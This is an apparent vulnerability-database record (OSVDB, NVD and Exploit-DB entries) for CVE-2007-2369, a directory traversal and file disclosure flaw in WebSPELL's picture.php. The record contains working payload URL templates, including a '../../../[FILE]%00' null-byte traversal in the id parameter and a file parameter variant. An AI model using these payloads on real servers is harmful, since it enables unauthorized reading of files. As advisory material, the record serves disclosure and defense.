{"bulletinFamily": "software", "viewCount": 0, "reporter": "OSVDB", "references": [], "description": "## Manual Testing Notes\nhttp://[target]/[PATH]/picture.php?id=../../../[FILE]%00\n## References:\n[Related OSVDB ID: 34637](https://vulners.com/osvdb/OSVDB:34637)\nOther Advisory URL: http://milw0rm.com/exploits/3673\n[CVE-2007-2369](https://vulners.com/cve/CVE-2007-2369)\n", "affectedSoftware": [], "hashmap": [{"key": "affectedSoftware", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "9d91eb2d3f5fc839bac0bce80e7c3ee0"}, {"key": "cvss", "hash": "a792e2393dff1e200b885c5245988f6f"}, {"key": "description", "hash": "905145e5827483b938eb19f53ba05688"}, {"key": "href", "hash": "aea6042a4085f3ebdf8391b6d069701f"}, {"key": "modified", "hash": "46c18469e5a0bc33c22997d563f83bec"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "46c18469e5a0bc33c22997d563f83bec"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "955b328dc7cd615c13af5464c9183464"}, {"key": "title", "hash": "0e324ced7d83aef1183048a11c3dbe83"}, {"key": "type", "hash": "1327ac71f7914948578f08c54f772b10"}], "href": "https://vulners.com/osvdb/OSVDB:34638", "modified": "2007-04-05T04:18:23", "objectVersion": "1.2", "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "vulnersScore": 5.0}, "id": "OSVDB:34638", "title": "WebSPELL picture.php file Variable Traversal Arbitrary File Access", "hash": "41a415bd244f82af9383a457dfadeebb81ca0f8a728ebb2f5577701f0beef4d2", "edition": 1, "published": "2007-04-05T04:18:23", "type": "osvdb", "history": [], "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "cvelist": ["CVE-2007-2369"], "lastseen": "2017-04-28T13:20:30"}

{"cve": [{"lastseen": "2017-10-11T11:07:08", "references": ["http://www.vupen.com/english/advisories/2007/1274", "https://www.exploit-db.com/exploits/3673"], "description": "Directory traversal vulnerability in picture.php in WebSPELL 4.01.02 and earlier, when PHP before 4.3.0 is used, allows remote attackers to read arbitrary files via a .. (dot dot) in the id parameter.", "edition": 2, "reporter": "NVD", "published": "2007-04-30T19:19:00", "title": "CVE-2007-2369", "type": "cve", "enchantments": {"score": {"modified": "2017-10-11T11:07:08", "vector": "NONE", "value": 5.0}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2007-2369"], "scanner": [], "modified": "2017-10-10T21:32:12", "cpe": ["cpe:/a:webspell:webspell:4.01.02", "cpe:/a:php:php:4.2.3"], "id": "CVE-2007-2369", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-2369", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "exploitdb": [{"lastseen": "2016-01-31T19:02:59", "osvdbidlist": ["34638", "34637"], "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"], "references": [], "description": "WebSPELL <= 4.01.02 (picture.php) File Disclosure Vulnerability. CVE-2007-2368,CVE-2007-2369. Webapps exploit for php platform", "reporter": "Trex", "published": "2007-04-05T00:00:00", "type": "exploitdb", "title": "WebSPELL <= 4.01.02 - picture.php File Disclosure Vulnerability", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2007-2369", "CVE-2007-2368"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "modified": "2007-04-05T00:00:00", "id": "EDB-ID:3673", "href": "https://www.exploit-db.com/exploits/3673/", "sourceData": "# WebSPELL <= 4.01.02 (picture.php) Remote File Disclosure Vulnerability\n# Discovered by: Trex\n# Visit: www.Trex-Online.net / www.UnderGround.ag\n# Comment: Happy easter!\n#\n# ___ ___\n# / \\ / \\ ___________________________\n# / / \\_/ \\ \\ / \\\n# \\__/\\ /\\__/ / GIVE ME A CARROT OR I WILL \\\n# \\O O/ \\ BLOW UP YOUR HOUSE /\n# ___/ ^ \\___ / ___________________________/\n# \\___/ /_/\n# _/ \\_\n# __// \\\\__\n# /___\\/_\\/___\\\n#\n#\n#\n# Vulnerability 1:\n# Advantage: works independently from PHP version.\n# Disadvantage: works dependently from PHP option register_globals (= on).\n#\n# http://[SITE][PAHT]/picture.php?file=[FILE]\n#\n#\n#\n# Vulnerability 2:\n# Advantage: works independently from PHP option register_globals.\n# Disadvantage: works dependently from PHP versions (< 4.3.0).\n#\n# http://[SITE][PAHT]/picture.php?id=../../../[FILE]%00\n#\n#\n#\n# Solution:\n# http://fixes.trex-online.net/picture.rar\n\n# milw0rm.com [2007-04-05]\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/3673/"}]}